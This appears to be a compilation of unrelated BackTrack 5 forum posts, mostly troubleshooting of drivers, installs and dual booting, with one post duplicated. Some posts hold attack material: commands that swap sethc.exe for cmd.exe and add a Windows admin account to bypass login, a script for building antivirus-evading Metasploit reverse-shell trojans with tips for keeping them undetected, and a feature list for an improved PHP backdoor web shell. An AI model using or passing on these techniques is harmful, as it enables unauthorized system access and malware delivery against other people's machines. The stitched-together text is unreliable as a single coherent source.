Hello, I've already read a lot of post about this but none resolved my problem, so here it goes:
(I'm using Windows 8... you know the unofficial windows... some guys picked up windows 7 and made some minor modifications to the CMD and uploaded it into the web has windows 8, but it is windows 7 the same..)

I've just downloaded Backtrack 5 KDE 32-bit OS, and i was trying to burn it into a DVD but it failed 3 time, that problem was solved i had to clean my leans... Anyways, after that i had a DVD with Backtrack 5 on it and it was time to shutdown my computer, I started it again with the DVD inside the optical driver and it loaded Backtrack 5 menu, i chose the 1st option and typed "startx". Everything was loading fine, when the desktop appeared i clicked "Install Backtrack", i followed the instructions and reached step 4, now (after all that reading) here is the problem:

1st- I want to dual boot Backtrack 5 with Windows 7 but it says that my Computer doesn't has any OS installed.
2nd- I have two 250GB disk working together so it makes a 500 GB HDD (well on windows it shows that C: = 500GB so...) but in the option to use the entire Disk it only was one of the HDD (i think..) with 250GB.
3th- The "side by side" option isn't there, probably because it doesn't identifies my OS (has i said in 1st).

So yeah that is all...
If you want more information or some pictures pleas ask for 'em :cool: ...

I've been a complete idiot and run apt-get autoremove on my backtrack 5 which lives in a usb hdd environment. This seems to a have crippled my ability to boot into the OS (it's fully encrypted) as it reports a "cryptsetup failure due to options or bad password". Mounting in my sda ubuntu environment is fine using the same passphrase.

The verbose boot reveals that libgcrypt.so.11 has gone missing from /sbin/crypsetup with an "error loading shared library, file/directory not found" complaint.

I have copied libgcrypt.so.11 from my ubuntu box into every possible region (i think) of the boot area of the external hdd: /tmp/sbin, /tmp/sbin/cryptsetup, /tmp/lib, /tmp/usr/lib, sequentially and the only difference thats made is that the logical partition now no longer wants to mount in ubuntu.

Any help would be greatly appreciated as I have vital documentation on the disk.

my notebook has some HDMI and a DVI port via the Docking Station sadly the output on both connections within BT5 is zero,
can anybody help ? which means my 32" Dell Screen doesnt work and ive to use the notebook screen....

Why doesn't Metasploit come with MySQL and Postgres already configured? What confuses me is that some people are reporting that Postgres works fine in metasploit out of the box. Why would the configurations be different from one VM to another? Some posters are saying that certain metasploit builds work better than others. Others say that it's the ruby version that's at fault (but if you change it, other things break).

This seems to be in either 'BUG' territory, or there needs to be a much MUCH better guide on setting up databases in metasploit.

i have BT5-Gnome-64 installed on a little netbook working perfect.
except when i go to sleep at night and leave the netbook on and yes this is realy true no jokes.

when i wake up i go and look at the netbook and it tryed to change my background about 25 times and opened firefox 2 times.
and it moved gerix-wifi-cracker that was open to the second screen instead of the first and it closed my airmon-ng that was open to sniff for WEP packets.

now is my question how is this possible??? and how can i solve it?

i have noticed it 2 times now at night but not over the day and i have a camera in my room no one touched the netbook at that night not me and no one else.

the netbook has the standard BT5-Gnome-64 version installed
and has the following specs.

So I am riding on plane early on a Monday morning traveling for work as i too often do. Its a small plane, 2x2 rows type deal....and my companion is a trench coat mafia wearing, shoot up the school looking individual. He pulls out a little netbook and boots up his computer shortly after takeoff. To my surprise it boots up BackTrack. I'm doing everything I can to contain my ear to ear grin thinking this is my chance to be....."the quieter you are the more you'll hear."

This fool gets a command prompt and starts typing the likes of "run"...."command"....."start"....."go".....an d after a few minutes just powers down by holding the button. I've been a user since BT2....educationally, recreationally, even at times professionally. I love the work you all do on this project, and cheers to the stupid who try to wield the dangerous.

The current PHP backdoor script it a little lacking in features and has a number of bugs in it. I've rewritten the script and done the following:

Uploads actually work, the method is a little rough but its the only way to upload to a dynamic folder (the current on in BT tries to pass a text field for the directory and the file in the same form; that can not be done in HTTP).

View source function to displays as text/plain so it doesn't output HTML characters and execute client side code (the current one in BT doesn't fix output making you execute any HTML and client side scripts in the document).

Download files with good error handling.

Good directory traversal functionality.

Editing of files.

Deletion of files.

Improved MySQL command execution.

Improved shell command error handling (warns if on safe mode).

Measures to bypass mod_security (it would otherwise prevent you from browsing certian directories or editing certian characters into a file).

An option to highlight likely database interaction files.

All code conforms to the principles of structured coding (all in if/else statements, no die() commands).

Allowed the gzip and download of a directory, this rarely works due to permissions.

Added the ability to CHMOD777 a folder, rarely works either.

Tested on Windows and Linux using PHP 4 and 5.

The only drawback this has in comparison to the other one is that its over 400 lines long, but other than that it is superior in every way. I request that this tool be considered to replace the current PHP backdoor script in backtrack.

I have an HP dv8000 / dv8235nr laptop(http://h10025.www1.hp.com/ewfrf/wc/d...roduct=1843762) trying to run BT5 32bit KDE. I am doing a full install to the HD. This machine is dedicated to BT5/Testing. When I boot off the live CD, I notice that the screen resolution is the max (1440 x 900) and works fine. However, if I do a HD install, the max resolution I can get is 1024x768. So, I tried the Gnome version and I got the same result. When I searched these forums and google, I found out that I needed to download and install the nVidia drivers. The display adapter in this laptop is a NVIDIA GeForce Go 7400.

So my first attempt, I installed KDE and downloaded the drivers from nVidia. I followed these instructions.(http://www.backtrack-linux.org/forum...deo-cards.html) I ended up getting the driver installed after a couple other steps not mentioned in the article (had to do with prepare-kernel-sources). when I would start X, the system would get through the first three symbols and hang on the fourth. I could never get into X again. I have reinstalled BT532bKDE at least 14 times trying all the different combinations and tips from other searches and I still can not get it to work. If I install Gnome, I can get it to work fine but I prefer KDE.

I have tried the following command but all failed:
apt-get install nvidia-driver
apt-get install nvidia-drivers

I am at a loss. I am not sure what to do next. I have searched the forums for hours and hours trying everything I can find with no success.

Before I begin, mods if you think this is not appropriate just remove this thread and I'm sorry.

I have just started an Offshore VPN to keep you 100% anonymous and protect your privacy.

Now what can I use it for??

Now the best reason of all total anonymity what this means your own internet service provider will not know what your doing. Second any blocked sites from your Internet service provider, school, work, and government will be accessible to you without their knowledge. Third Hot Spots can be found everywhere now, which is very convenient but also dangerous. Using a VPN will prevent Hot Spot sniffing devices from viewing your logins, passwords and private data.

I'm sure that title can generate a lot of jokes anywho movin' on...
:D
I want to become a Penetration Tester. And the more I research the subject the more confusing it seems to become. I also want to be able to write my own tools etc... So I have started learning Python2.7, MIT's 6.00 Computer Science course youtube lectures, and downloaded a bunch of PDF's on Computer Science, Ethical Hacking, etc...

I have also looked into various courses on the subject and found a mountain of information that will take me well on into my 70's to finish reading. So I have come here to ask you guys where and what I need to learn in order to become a certified Pentesting nerd (and I say nerd lovingly). I live in Canada so any course/certification needs to hold weight in my country. I am also poor as hell and cannot afford to waste money on courses that will not help me achieve my goal. Thanks for your time and have a great day:confused:

I logged in as root, then I was browsing (e.x saw the video online). Not long after, my computer is logged out themselves and give a warning as shown below. How can I fix it?
Thank you.
Immagini allegate

Over the past 2 weeks I have been playing with different implementations on the usage of DD. I began this when I came across an article somewhere on the net regarding shred/sdelete and its ineffectiveness at wiping data; sadly I don't remember the link or I would post it. However, I decided to do a file backup on my laptop, and came across the fact that I saved the webpage. It is as follows.

The above experience really got me into thinking how quickly DD could overwrite freespace on a device, and if it was "cross-platform" enough for me in the sense of different file sytem architectures (ext2, ext3, ext4, NTFS, etc....). So, I did what any good true hacker would do and I started experimenting on my own, not just taking the articles on the net at face value. About 3 nights ago I happened to be booted into Ubuntu when I decided to try an implementation of DD using a method that translated the /dev/zero output to all 1s

This made me a file 512 bytes in size (512 is the default byte-size unless specified otherwise with bs=) that was filled with 1s for characters. A subsequent: "hexdump -C < foo" confirm the output of 1s. At this point I started trying various implementations of bs & count combinations to come up wih the quickest method for filling a certain device. I made the following observations.
All these were done on different partitions than the operating system in which i tested it. ie.... I filled /dev/sda2 while operating from /dev/sda1, and /dev/sda1 while operating /dev/sda2, /dev/sda3 was windows so i just choose the ubuntu to wipe from.

To see the current speed and progress of a dd operation you simple need to: "ps aux | grep dd", then note the process ID, then issue "kill -USR1 <pid>. This will make a progress dump on the screen doing the DD. The average speed for writing to ext2 & ext3 was found to be around: 22MB/second. The average speed for writing to my NTFS partition averaged out around 5MB a second, it started strong around 20MB a second, but averaged out to the 5 after roughly 1GB of writing.

It was when I happened to have missed a keystroke that the thought for the whole article came up! I was in ubuntu (/dev/sda2) and i had mounted (/dev/sda1) to my home directory ie (mount /dev/sda1 ~/mt)

I then changed to the mt directory (/dev/sda1) and started typing, but I was careless and I typed: "dd if=dev/zero | tr '' '\49' > foo". I then issued my kill -USR1 command to see how the progress was coming along and it was at a whopping 48MB/sec! Couldn't believe it...., So, I killed the original process and tried to figure out what had happened. In looking at my syntax I noticed that I did not include a "/" in front of the dev for the if= option. I was now using the (/dev/sda1) partitions /dev/zero file to write to foo.

So, here are some questions I have regarding my experience I hope the community can chime in on:

1) I wonder if anyone else has used dev/zero vs /dev/zero before.

2) Why is if=dev/zero double the speed of if=/dev/zero (Something bout it not being the active O/S?)

3) Help me to improve the following syntax please; the goal of which being able to background DD command that uses pipes and issue kill -USR1 to a variable versus parsing the running processes.

- Example 1:
Code:
dd if=/dev/zero of=foo & pid=$!
the user is then able to type
Code:
kill -USR1 $pid
and see the results

- Example 2:
Code:
dd if=/dev/zero of=foo | tr '' '\123' > foo & $pid=$!
The problem here is that it issues the pid to the tr command and not dd, I've tried various implementations placing the ampersand right after dd and such, but it all fails......And yes, I am aware that I could simple issue a test expr to make the value of $pid=$pid-1 so to speak, but I would like to learn to proper syntax so that I can understand why it doesnt work. The goal is to background DD so that I dont have to open another screen, while at the same time piping DDs output to a customized command so that I can make it something other than a "null" filled file.

V/r,
Snafu
Pffbt..

Quote:
I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass..

i am triple booting windows7 , ubuntu 10.10 and BT5 , BT5 is giving me warning that 0 bytes are free.
How can i fix it without reinstalling ?
If i run gparted using ubuntu, and increase size of BT installation, will it fix my issue ?

hi, guys
my "new" "video" comes from trying to run the function automatic_autopwn in FAST-TRACK.Ive problems with sqlite3 databases (not aviable in my Metasploit) I'm allowed to edit the file that is[ autopwn.py] in the directory / pentest / exploits / fasttrack / bin / ftsrc, inserting the "parameters" of the postgresql database (supported). I know that this video is good for almost nothing! but at least I can use the button "2" after. / fast-track.py-I :)
Sorry for my English! Sorry for video quality :)
if you want to see: http://vimeo.com/26552328

I attach my file autopwn.py (for the configuration of postgresql in BT5 follow the tutorials in the forum)! many thanks bye!
File allegati

As you may know, I am attempting to rise above the level of script kiddie knowledge of backtrack, metasploit, and indeed hacking.

my current roadblock is I believe, privilege escalation. I am working on a vulnerable vm where I have gained user level privileges. I have researched possible vulnerabilities and exploit code. Problem: I have always used metasploit to deliver code. I have no idea how to manually exploit a service or cause a desirable condition. Also, I don't understand the source code so I can understand it and what it does, how to use it to exploit the vulnerability.

I have done some research, I am reading the Wikipedia article on shellcode (dont laugh) and it states:

"Injecting the shellcode is often done by storing the shellcode in data sent over the network to the vulnerable process, by supplying it in a file that is read by the vulnerable process or through the command line or environment in the case of local exploits."

I take this to mean injecting the code into packets that are read by a vulnerable application and the code is executed(remote exploit?), or the same through a file(how do I get the file on the system?), or somehow causing the required condition on the local machine. (how?)

I've been experimenting with cracking WPA PSK using john the ripper and I have a few questions that im finding difficult to answer. I've got how to plug wordlists in and have john sort through them but its custimizing the rules that i dont understand. Like theres two words in the word list that are seperate "happy" and "him". I've combined them to make my wpa password as happyhim. How can i get John to pair words up next to each other that dont exceed a sertain amount of characters. Basicly i want to compile a very large wordlist that can be very flexible with all the words.

If anyone knows of any good step by step tutorials explaining all the different rules more in depth and how to use them I'd find it helpful. The rules file that comes with JTR is kind of confusing and im pretty sure ill mess something up if i cant follow along.

The GuruPlug Plus uses a Marvell Kirkwood 6281A1, 1.2GHz processor and the Sheeva runs a 1.2 GHz Marvell Kirkwood 6281. The former is billed as an "ARM-compatible CPU (aka Feroceon)".

I am trying to install BT5 ARM on both the Sheeva and Guru Plus (just for jollys) but can anyone see any reason why it will *certainly* fail on either of these two processors? I haven't invested much time in doing this yet, and before I actually start to care it would be good to know if it is outright futile.

This is a very easy crack, allowing you to open a windows command prompt with system privileges at log-in. shouldn't take more than 3 minutes. It replaces sethc.exe which can be invoked at start-up by pressing shift five times (something to do with contrast) with cmd.exe: Since you haven't logged in yet it opens a command prompt with system privileges (runs in backtrack).
Code:
mkdir /mnt/ntfs
mount -t captive-ntfs /dev/hda1 /mnt/ntfs
cd /mnt/ntfs/windows/system32
mv sethc.exe sethc.old; cp cmd.exe sethc.exe
sync
cd ~
umount /mnt/ntfs
shutdown r now
To make a new admin that you can login to (apart from EVERYTHING else that you can do) use the following commands (replace admin with the username and pass with your password)
Code:
NET USER admin pass /add
NET LOCALGROUP administrators admin /add
reboot and you're done.
No need to bother with cracking people's passwords (god forbid, this may take years, as with mine). :cool:
(please only use on your own computer or with other people's permission)

So I've troubleshot as much as I can to figure out exactly what is going on. I'm running Honeycomb 3.2 with the Tiamet 2.0 kernel. I ended up going line by line through the bootbt shell script and found that at line:

Code:
mount -o loop,noatime -t ext2 $kit/bt5.img $mnt
I'll receive:

Code:
ioctl LOOP_SET_FD failed: Device or resource busy
I've tried rebooting. I've reinstalled busybox multiple ways to no avail.
Is there something different with Honeycomb 2.6 as a result of the kernel?

So I boot up the DVD-RW I burned it on, burned at slowest speed.
I let it boot, I get the interface to select what I want to boot... memtest or safe mode etc...
I boot up the default option, text mode... It loads everything up and then I get a black screen.

It's black as if the monitor is turned off, completely black.

I tried both the iso and the dvd itself in vmware, and it boots up fine. Where I would get a black screen,
vm gets the backtrack background and then the place where I can type startx, then it boots up and I can install...

So probably there's some problem with my graphics card or I am missing drivers?

I've got BT5 (GNOME)installed on my VM at the moment for several testings to make certain wether i'll make it my Prime OS or not and i'm having some issues that i'm not sure where to turn to with.
for the record - i've looked in ubuntu forums and google for answers but none helped so i'm hoping here will find salvation.

issue 1:
Tried installing Compiz fusion, emerald and the rest of them packages. download completed successfully & seems to be installed fine but i can't run any of the features.
Is it caused by the fact this is on VM? or there's a known issue with BT5 and compiz fusion?

I've got BT5 (GNOME)installed on my VM at the moment for several testings to make certain wether i'll make it my Prime OS or not and i'm having some issues that i'm not sure where to turn to with.
for the record - i've looked in ubuntu forums and google for answers but none helped so i'm hoping here will find salvation.

issue 1:
Tried installing Compiz fusion, emerald and the rest of them packages. download completed successfully & seems to be installed fine but i can't run any of the features.
Is it caused by the fact this is on VM? or there's a known issue with BT5 and compiz fusion?

I am just posting as I currrently have a wireless usb adapter wusb600n for my pc and I am trying to get it working with Backtrack 5 on VMware. I have seen many posts on the internet pertaining to this issue however they all seem a bit old and i cant seem to follow them all the way as some of the links are down. I have managed to get backtrack 5 to recognise the usb adapter and it shows up as an interface in airmon-ng, however when i try to put it into monitor mode the device locks up and I have to unplug it and reattach to get it recognised again.

I was wondering if someone could please help me in getting this adapter working on BT5 as I really want to use it and from what I have read other people have got it working? Also as the other posts on this issue are now over 1yr old has this issue not been resolved and why not lol?

I am using the Backtrack 5 Gnome 32-bit edition. I have installed it as a persistent install on my pendrive. Whenever I boot into it, regardless of whether I have created another user or not, it automatically login as root. I want to make it in such a way so that it ask me for the username password every time I boot into it.

I know that I have to do something with the initrd. I edited it as mentioned in the LiveCD Customization article on ubuntu website, but then I am not able to login.

Excuse my ignorance, but after a reboot, my home folder link in the drop down "places" isn't working, it comes up with an error from "KPackage" that says
Quote:
This item is not supported by your backend, or it is not a file
then lists root.

even if i drag a homefolder to the launch bar it returns the same problem.

As the topic says, my drivers work great on the live usb
Sound , Video , Audio....
But when it comes to installing BT5 to my hard drive, my graphics card stops working, my sound quits on me and my wifi is gone.....
Or is there a switch somewhere , like there was for network in bt4?

I'm trying to spoof my mac address for when I use aircrack, And I can change the mac address with macchanger, But macchanger only changes my mac for wlan0, and when I start wlan0 again, it sets up mon0 as the monitor interface, but mon0 uses my default mac address instead of the spoofed one.
I basically set it up like this...
Code:
airmon-ng stop wlan0
macchanger --mac ##:##:##:##:##:## wlan0
airmon-ng start wlan0
wlan0 keeps the spoofed mac while mon0 uses the default.
I've tried using macchanger --mac ##:##:##:##:##:## mon0, but that doesn't work.
Any ideas?

I have BackTrack 5 KDE 64 bit installed next to several other operating systems (Win 7, ubuntu, mint) on a Dell Studio XPS 1640. Everything is working fine except this annoying beep at poweroff. It last for about 1 second and is audible immediately when I execute the "poweroff" command via pressing enter.
In blacklist.conf I tried blacklisting pcspkr and also snd_pcsp to no avail, so now I am wondering what else I can try or see why it is even beeping at all?

I'm using a dell inspiron n5110 with the following wireless card: Intel®Centrino® Wireless-N 1000, 802.11 g/n
when i try to get airmon-ng working, it won't say anything under chipset, driver, etc.
from the research i've done it seems as though it should be natively supported (maybe slightly different model), and if not i would definitely say supported with a download. any help/pointers?
Maybe i'm just entering the command wrong? ("airmon-ng start wlan0 (or start wifi, neither works)")

i have been doing some research in getting my driver to support monitor mode..from everything i read its not possible sure certain things can be done but it cannot be fully compatable with the wl driver.. this was over a year ago and im wondering if anything new has come up that may give my driver another chance....thanks

- The Wifi network I try to access is using WPA-PSK and I've already found out that key.
- However, the router's DHCP is disabled, and I do not know its IP Range, as well as its subnet mask and default gateway.

Therefore, I cannot connect to that Wireless network.

Is there any way/tools to detect the IP Range of the network from the outside ?! My friend told me that I can use some tool like Wireshark to sniff packet and find out that IP range, but how can I sniff when I cannot connect to it ?!

Is there any tool in Backtrack that can help me to do it ?! If yes, please guide me a little bit on how to use it since I'm not an expert in using Linux.

Now I want to install backtrack 5 on the freespace using the swap in both os's. Natural I want to make sure I don't fubar my Ubuntu install. What would be the correct procedure to do this? I've heard that backtrack uses grub 1.5 and Ubuntu uses 2. Has anyone done this before and can give me some pointers?

Hey,
I wrote a simple shell script to bypass AV's like AVG, Avast and emisoft.
It certainly will not bypass all AV's. Just the easy ones :p
The script can be downloaded here : http://home.base.be/%72%68%69%6E%63%...reatetrojan.sh
I saw somebody demonstrate this method of av evasion in a youtube video and I decided to write a script for it to speed up the process.
The script let's you choose between 2 payloads. the meterprer/reverse_tcp and the shell_reverse_tcp. (feel free to add more)
It let's metasploit generate the code for the payloads and then puts them in a template.c from the metasploit framework and fils it with some random junk and then compiles it with mingw32. So be sure you have mingw32 installed :)

Code:
apt-get install mingw32
The script also has the option to use your external ip adress and will look it up for you on a Belgian website.
This is just a fun feature I added. So don't use it for anything illegal :D

If you want to scan the trojan the script creates with multiple AV's, pls use http://vscan.novirusthanks.org/
And be sure to select the "do not distribute this sample" option so it won't get detected that quickly.

If it get's detected after a month or so, you can always change the variable names and the random junk in the c file.
This will probably make it undetectible again for the easy AV's ofcourse :p

Hey,
I wrote a simple shell script to bypass AV's like AVG, Avast and emisoft.
It certainly will not bypass all AV's. Just the easy ones :p
The script can be downloaded here : http://home.base.be/%72%68%69%6E%63%...reatetrojan.sh
I saw somebody demonstrate this method of av evasion in a youtube video and I decided to write a script for it to speed up the process.
The script let's you choose between 2 payloads. the meterprer/reverse_tcp and the shell_reverse_tcp. (feel free to add more)
It let's metasploit generate the code for the payloads and then puts them in a template.c from the metasploit framework and fils it with some random junk and then compiles it with mingw32. So be sure you have mingw32 installed :)

Code:
apt-get install mingw32
The script also has the option to use your external ip adress and will look it up for you on a Belgian website.
This is just a fun feature I added. So don't use it for anything illegal :D

If you want to scan the trojan the script creates with multiple AV's, pls use http://vscan.novirusthanks.org/
And be sure to select the "do not distribute this sample" option so it won't get detected that quickly.

If it get's detected after a month or so, you can always change the variable names and the random junk in the c file.
This will probably make it undetectible again for the easy AV's ofcourse :p

After i installed the driver and the CUDA toolkit i am having a problem on startx (followed http://www.backtrack-linux.org/wiki/...A_On_BackTrack on installing the driver and toolkit). I tried adding BusID to xorg.conf however i made me run into black screen after startx. Although i know X is running because when i press CTRL-ALT-DEL and then Enter i can shutdown properly. I think this problem was caused by my monitor is connected to the Intel's graphic card. So when I use the Nvidia's graphic card nothing's output to the monitor. If i delete xorg.conf I can successfully boot into GNOME. If i change Grub's setting to i915.modeset=1 i will run into black screen while booting. Can anyone tell me how to make my Nvidia graphic card work properly?

Hello Forum, I have spent around 5 day's trying to get my wireless card to work. It worked when I initially installed backtrack, but after I installed Cuda and upgraded the distrobution I have not been able to Even see the wireless card. I am running off of a xps computer and I have tried many things with much failure.
I have tried using the linux and xp drivers, but that has not gone so well. Here is the linux driver
rtl8192u_linux_2.6.0006.1031.2008
With that when compiliing the make file this occured
make[1]: Entering directory `/usr/src/linux-source-2.6.38'

WARNING: Symbol version dump /usr/src/linux-source-2.6.38/Module.symvers
is missing; modules will have no dependencies and modversions.

Greetings all,
Yaakov Goldberg recently developed a new tool for any Linux distribution. Yaakov released it with this statment, "the tool is called uberharvest and it is intended to be used as an information gathering tool for harvesting emails from a URL entered by the users. In addition, the user can use the tool to scan bunch of URLs from a text file and then return all emails that have been found in each website.The tool is completely for FREE and can be used for pentesting and hacking activities. To get the tools go through the following steps.

New to linux based stuff in general, used backtrack 3 in the past, anyway i made a liveCD of BT5 used the install backtrack shortcut on the desktop to install as a dualboot with windows 7, want to change it to start up windows by default if no input is givin instead of BT5, looked for the lilo.conf in the etc folder and other places, cant find it with the shell commands, so what should i do?...

I have installed BackTrack5 on my HDD. When I boot my computer, I enter my username (root) and the password.
Then I want to start the GUI Environment, so I type the command startx. But then I have only a black screen.
My TV says that there is no connection (cable = HDMI).
Is it a problem with the HDMI-Cabel or is there something other wrong? When I boot the LiveCD everything works. :S

While I have in the past been focused on Windows exploitation (and a beginner with that) I find myself having to expand my horizons. In keeping in line with my training, I need to enumerate information on the machine (vm) that I want to attack. Unfortunately I have little ideas where to start. The book I have access to at the moment seems fixed on Windows enumeration, and google has not been much better. I see results on Linux NIC enumeration.

Steps taken so far:
Scanned my network and found a "victim".
Scanned the host and performed port, OS and version detection.
"banner grabbing", connecting to the services with netcat.

at this point there is a gap in my knowledge. I know that eventually I will need to crack passwords and eventually gain access to the system, but I do know that if I want to gain access through one of the open services, I will need to enumerate the users and possibly other information on the machine. Can anyone point me in the right direction, or point me to some resources?

I'm trying to install flash player but since I'm a super newbie in both linux and backtrack I failed.:confused:
I tried to download it by apturl by the link(apt:adobe-flashplugin?channel=$distro-partner) they porvided but it says "The channel '-partner' is not known"(don't know what it says actually)
I tried the .rpm by alien, but again failed.:(
Then I found this topic:Backtrack 5 - How to get flash player working on Gnome / KDE x64
I did it half way(not sure I did it correct, since I didn't get any response from the rm commands), then I realized that adobe has stopped supporting the square and the link redirects to the flash player 11 beta. I tried to install it with the commands in the topic (tar xvfz and mv -f) but then again I couldn't use it in firefox.:mad:

Okay, let me start by saying I am a complete and utter Linux NOOB. I really need some help here...

I recently bought an Alfa AWUS036nh wireless usb adapter. I needed the wireless adapter because I am using VMWare Workstation to run BT5-gnome-32 on my Windows 7 Dell Studio XPS.

I have seen some users saying that the adapter works out of box for them. Not the case for me. I have the cd which contains a driver for a Linux 2.6 kernel. This .tar.gz file, when extracted becomes a folder named "rt18187_linux_26.1025.0328.2007". This file contains two other .tar.gz files which, when extracted become folders named: "ieee80211" and "rt18187".

but... I have no idea how I'm supposed to install the driver. I wish there was a way to cheat and use the "apt-get install" command but I can't figure that out. I have looked up everything from how to install .tar.gz files to web sites and forums on this driver in particular... and I am still stumped.

All the information that I DO find is over my head. I'll follow instructions when I read other threads on the topic and there are always problems that I can't solve and that aren't discussed either. This is becoming very frustrating, especially considering all this trouble is over a wireless internet adapter and I've never had a problem with that in my life.

PLEASE HELP ME! Thanks in advance for any help you guys can offer. I like the idea of Linux and I really want to use BT5 for Aircrack purposes and as a start into the world of Linux operating systems... But DAMN, it's really difficult for me to get this driver happening.

I am running BackTrack 5 KDE x86 (fresh install, switched from BT5-Gnome, where .bundle installed and ran perfectly). Installer runs with no errors, however when I attempt to start VMWare Player, I receive the following messages:

Code:
C header files matching your running kernel were not found. Refer to your distribution's documentation for installation instructions
Code:
Before you can run VMWare Player, several modules must be compiled and loaded into the running kernel. Kernel Headers for version 2.6.38 were not found.
It then asks for me to specify a location.

Package linux-headers has been installed, and can be seen in the default directory which vmplayer directs to, however even with selection of the folder, vmplayer will not recognize it. Hardware is Asus K50IJ Intel.

Any help regarding this matter would be greatly appreciated. Thank you for your time.

1. To make the login gui which should be in (Dragon Icon start button) then (Settings) and then click on (System Settings). You would scroll down to where it says (Login Screen). In the Login screen gui you will look at the tabs which should be (General)(Dialog)(Background)(Theme)(Shoutdown)(Us ers)(Convenience). You will click on the one that says (Theme) and you should be able to see the buttons (Install new theme)(Remove Theme)(Get new theme). You will click on (Get New theme) and download the themes you want. I got a theme called Asphyxia which you can type in the search to see what im talking about. Once you have the theme that you want. Click on that theme and click Apply.

# To start kdm even if it is not the default display manager, change
# HEED_DEFAULT_DISPLAY_MANAGER to "false."
HEED_DEFAULT_DISPLAY_MANAGER=true
DEFAULT_DISPLAY_MANAGER_FILE=/etc/X11/default-display-manager

# If we upgraded the daemon, we can't use the --exec argument to
# start-stop-daemon since the inode will have changed. The risk here is that
# in a situation where the daemon died, its pidfile was not cleaned up, and
# some other process is now running under that pid, start-stop-daemon will send
# signals to an innocent process. However, this seems like a corner case.
# C'est la vie!
if [ -e $UPGRADEFILE ]; then
SSD_ARGS="--pidfile $PIDFILE --startas $DAEMON"
else
SSD_ARGS="--pidfile $PIDFILE --exec $DAEMON"
fi

exit 0
If you do not change the information it will not load your login gui.

3. Now you will open up the terminator or shell what ever your using and type this command in there.
Code:
root@bt:~# update-rc.d kdm defaults
4. Reboot and see if it loaded. If it didn't then use this next command b/c it might not of gotten the execuetable in the shell script. Go in to the folder 1st then use the command. Use the command "cd /etc/inti.d" with out the quotes.

Code:
root@bt:/etc/init.d/# sudo chmod +x kdm
5. If you need to go back to CLI then look at this page.CLI or KDM Theme

Loading Boot Splash

This one is simply just go to (Dragon Icon start button) then (Settings) and then click on (System Settings). Click on (Workspace Appearance) Then On Splash Screen and then on (Get New Themes...) I used the Asphyxia one which can be found there, just type it in the search box. click on your splash screen and select apply. Your done.

Change background wallaper

Right click on any where on your desktop and in the mouse menu just select (Folder View Settings Alt+D, Alt+S) which should be at the bottom. It should open up with the wallpaper. Click on Get New Wallapapers... and I leave the rest to you.

I am trying to expand my horizon with exploit development.
And thus I am wondering how you find your zerodays?
My methods now are:
If there is a source code.
1. I pick a product I frequently use.
2. I launch cscope to find dangerous functions (memcpy, strcpy, execvl, etc).
3. For all these functions I back trace the arguments to there origin.
4. In case the origin is user supplied or otherwise from an source that could be tampered with I write this down.
5. After all of the functions have been back traced I attach gdb to a binary form and try to malform the buffer the way I require.
6. I document this and then try to stabilize the exploit.

In case I do not have the source code, I do the same.
But using IDA or Radare (Depending if its a win app or a Unix app)

I know I should fuzz. But often I just cant be asked.
Just since I don't want to write a specific fuzzer for each application. I never got something out of it and thus I don't find it rewarding.

What are your ways achieve this?
I think there are better ways, once I read something about a tracer tool that noticed if a user supplied buffer was allocated on the heap and it reported the size of the buffer etc. I forgot the name of that tool but I think that has some potential.

So, you may freak out here and say OH MY! THIS IS NOT A BUG IN BT ITS A BUG IN VMWARE!! But before you read further, I'm just going to state that this adapter (alfa awus036nh) works perfectly when booting from a hard drive, and I believe it to be something that can be fixed rather easily to the benefit of many people.

When booting Backtrack 5 through VMware Fusion (also happens in VMware workstation), the adapter in question will fail to properly start up when you modprobe the driver. It'll go into monitor mode, but it fails to successfully sniff traffic most the time when you try and airodump-ng or something like that. I've searched and searched for an answer to this, because it's frustrating to know that it works so well booting from a USB or Hard Drive, but that for some reason it hardly works from VMware.

I have a little shell script I wrote just to reset the device, and test for injection on channel 11:

Code:
#!/bin/bash
modprobe -r rt2800usb rt2x00usb rt2800lib rt2x00lib crc_ccitt mac80211 cfg80211
modprobe rt2800usb
airmon-ng check kill && airmon-ng start wlan0 11
aireplay-ng -9 mon0
I have to run this script anywhere from 1-10 times to get injection working properly. Again, I'm not really sure if this thread belongs in this section, but honestly I'm not sure where else it would go... Considering the only reasonably helpful thread I've found on the subject has 7k+ views and no solution, I would imagine that a lot of people (myself included) would appreciate a fix, if it's at all possible.

Last week or so I got some free time and decided to start playing around with extracting browsing history from the the index.dat files. I know there are a million and one tools out there to do this, I just wanted to figure it out myself without using Windows API's. I eventually want to incorporate it into Metasploit Post module that grabs all kind of good info from IE, so I kind of had an alternate motive for trying to parse out the file. Anyways I came up with a ruby script that parses out the url, date accessed, and date modified. It will work on the Index.dat's from the Cookies, History, and Temporary Internet Files folders. It's not a post module yet, but probably soon. i just need to invest some time into using this history list to hash and compare to the encrypted urls for the auto-complete passwords stored in the registry. Another script for another day.

I had a hard time finding good information on how to parse this data, so I also wrote a short blog post that talks about the structure of the index.dat file and how I parsed out the data in case anyone's interested. Here's the blog post: Parsing IE's Index.dat

I have Macbook Pro 5,5 and seem to have problem with obtaining IP while trying to connect to my network which is: DD-WRT with WPA2 TKIP. Having read that TKIP can cause some connectivity issues I changed it to WPA2 PSK and was able to connect - but it's very flaky and requires several reconnect attempts or even reboot...

I have Broadcom BCM4322 with b43 driver. Previously I had Ubuntu installed and used Broadcom STA driver which worked fine, so I'm guessing I should be using that instead.

Trying to use jockey didn't work. It ended up removing the old driver, while failing to install the STA driver. Some googling around revealed that it was cause by synaptic still running. I made sure synaptic was not running and the problem stayed the same.

Then trying to install it manually from Broadcom didn't go anywhere either. They had a patch for the driver but it was for 2.6.37 and didn't guarantee it would work on on newer versions, which for me, didn't.

So I decided to just stick to the b43.

Today I run apt-get upgrade and saw that there was something coming through for Broadcom - but ended up giving error message:

Quote:
Deleting module version: 5.60.48.36+bdcom
completely from the DKMS tree.
------------------------------
Done.
Loading new bcmwl-5.60.48.36+bdcom DKMS files...
First Installation: checking all kernels...
Building only for 2.6.38
Building for architecture i686
Building initial module for 2.6.38

WARNING: Symbol version dump /usr/src/linux-source-2.6.38/Module.symvers
is missing; modules will have no dependencies and modversions.

LD /var/lib/dkms/bcmwl/5.60.48.36+bdcom/build/built-in.o
CC [M] /var/lib/dkms/bcmwl/5.60.48.36+bdcom/build/src/shared/linux_osl.o
CC [M] /var/lib/dkms/bcmwl/5.60.48.36+bdcom/build/src/wl/sys/wl_linux.o
